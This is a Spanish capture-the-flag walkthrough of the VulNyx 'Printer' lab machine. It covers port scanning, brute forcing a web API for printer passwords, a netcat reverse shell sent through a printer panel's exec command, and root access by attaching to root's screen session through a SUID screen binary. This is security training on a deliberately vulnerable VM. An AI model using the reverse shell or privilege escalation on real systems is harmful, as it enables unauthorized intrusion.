VulNyx - Printer
Information
Printer es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 12:21 CEST
Nmap scan report for 192.168.1.120
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9999/tcp open abyss
❯ nmap -sVC -p22,80,9999 192.168.1.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 12:28 CEST
Nmap scan report for 192.168.1.120
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Konica Minolta Printer Admin Panel
| Password:
| NULL:
|_ Konica Minolta Printer Admin Panel
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.95%I=7%D=7/9%Time=686E4462%P=x86_64-pc-linux-gnu%r(NUL
SF:L,25,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\n")%r(GetReque
SF:st,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x2
SF:0")%r(HTTPOptions,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\
SF:n\nPassword:\x20")%r(FourOhFourRequest,2F,"\nKonica\x20Minolta\x20Print
SF:er\x20Admin\x20Panel\n\nPassword:\x20")%r(JavaRMI,2F,"\nKonica\x20Minol
SF:ta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(GenericLines,2F,"\
SF:nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(RT
SF:SPRequest,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassw
SF:ord:\x20")%r(RPCCheck,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Pa
SF:nel\n\nPassword:\x20")%r(DNSVersionBindReqTCP,2F,"\nKonica\x20Minolta\x
SF:20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(DNSStatusRequestTCP,2F
SF:,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r
SF:(Help,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:
SF:\x20")%r(SSLSessionReq,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20P
SF:anel\n\nPassword:\x20")%r(TerminalServerCookie,2F,"\nKonica\x20Minolta\
SF:x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(TLSSessionReq,2F,"\nK
SF:onica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(Kerb
SF:eros,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\
SF:x20")%r(SMBProgNeg,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel
SF:\n\nPassword:\x20")%r(X11Probe,2F,"\nKonica\x20Minolta\x20Printer\x20Ad
SF:min\x20Panel\n\nPassword:\x20")%r(LPDString,2F,"\nKonica\x20Minolta\x20
SF:Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(LDAPSearchReq,2F,"\nKoni
SF:ca\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(LDAPBin
SF:dReq,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\
SF:x20")%r(SIPOptions,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel
SF:\n\nPassword:\x20")%r(LANDesk-RC,2F,"\nKonica\x20Minolta\x20Printer\x20
SF:Admin\x20Panel\n\nPassword:\x20")%r(TerminalServer,2F,"\nKonica\x20Mino
SF:lta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(NCP,2F,"\nKonica\
SF:x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20");
Shell (printer)
80/TCP (HTTP)
Site (/)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.120/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.120/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/api (Status: 301) [Size: 312] [--> http://192.168.1.120/api/]
/server-status (Status: 403) [Size: 278]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Site (/api)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.120/api
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.120/api
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/printers (Status: 301) [Size: 321] [--> http://192.168.1.120/api/printers/]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Site (/api/printers)
ID & Extension Brute Force
❯ wfuzz -c --hc=404 -z range,1-5000 -z list,json-yml -u "http://192.168.1.120/api/printers/printerFUZZ.FUZ2Z" 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.120/api/printers/printerFUZZ.FUZ2Z
Total requests: 10000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 6 L 9 W 82 Ch "1 - json"
000000007: 200 6 L 9 W 78 Ch "4 - json"
000000003: 200 6 L 9 W 80 Ch "2 - json"
000000009: 200 6 L 9 W 77 Ch "5 - json"
000000005: 200 6 L 9 W 79 Ch "3 - json"
000003197: 200 6 L 9 W 97 Ch "1599 - json"
Total time: 4.607142
Processed Requests: 10000
Filtered Requests: 9994
Requests/sec.: 2170.542
Envío una petición GET a cada uno de los IDs obtenidos y consigo los passwords de las impresoras
❯ for i in 1 2 3 4 5 1599; do curl -sX GET "http://192.168.1.120/api/printers/printer$i.json" ;done
{
"printer": {
"printer_id": "1",
"printer_password": "P4ssw0rd!"
}
}
{
"printer": {
"printer_id": "2",
"printer_password": "iloveme"
}
}
{
"printer": {
"printer_id": "3",
"printer_password": "qwerty"
}
}
{
"printer": {
"printer_id": "4",
"printer_password": "admin"
}
}
{
"printer": {
"printer_id": "5",
"printer_password": "root"
}
}
{
"printer": {
"printer_id": "1599",
"printer_password": "$3cUr3Pr1nT3RP4ZZw0rD"
}
}
9999/TCP (PRINTER)
Me conecto a la impresora exitosamente con el password $3cUr3Pr1nT3RP4ZZw0rD
❯ nc -vn 192.168.1.120 9999
(UNKNOWN) [192.168.1.120] 9999 (?) open
Konica Minolta Printer Admin Panel
Password: $3cUr3Pr1nT3RP4ZZw0rD
Please type "?" for HELP
>
Introduzco ? para que muestre el HELP y observo la función exec que permite ejecutar comandos
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
>
Reverse Shell
Obtengo una shell como usuario printer
> exec busybox nc 192.168.1.5 443 -e /bin/sh
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.120] 52164
id ; hostname
uid=1000(printer) gid=1000(printer) grupos=1000(printer)
printer
Privilege Escalation
Enumeration
SUID
El usuario printer disponde de permisos 4755 (SUID) sobre el binario screen
(Esto le permite ejecutar el binario en el contexto del propietario que en este caso es root)
printer@printer:~$ find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
printer@printer:~$ ls -l /usr/bin/screen
-rwsr-xr-x 1 root root 482312 feb 27 2021 /usr/bin/screen
Processes
El usuario root tiene abierta una sessión de screen llamada /root
printer@printer:~$ ps aux |grep "screen"
root 325 0.0 0.0 2484 408 ? Ss 12:19 0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
Abuse
Revisando el help de screen veo el flag -x que permite conectar a una sessión activa
-x Attach to a not detached screen. (Multi display mode).
Me convierto en usuario root accediendo a la sessión
printer@printer:~$ screen -x root/
root@printer:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
printer
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@printer:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
616e****************************
7cc6****************************
Hasta aquí la resolución de la máquina Printer.
Happy Hacking!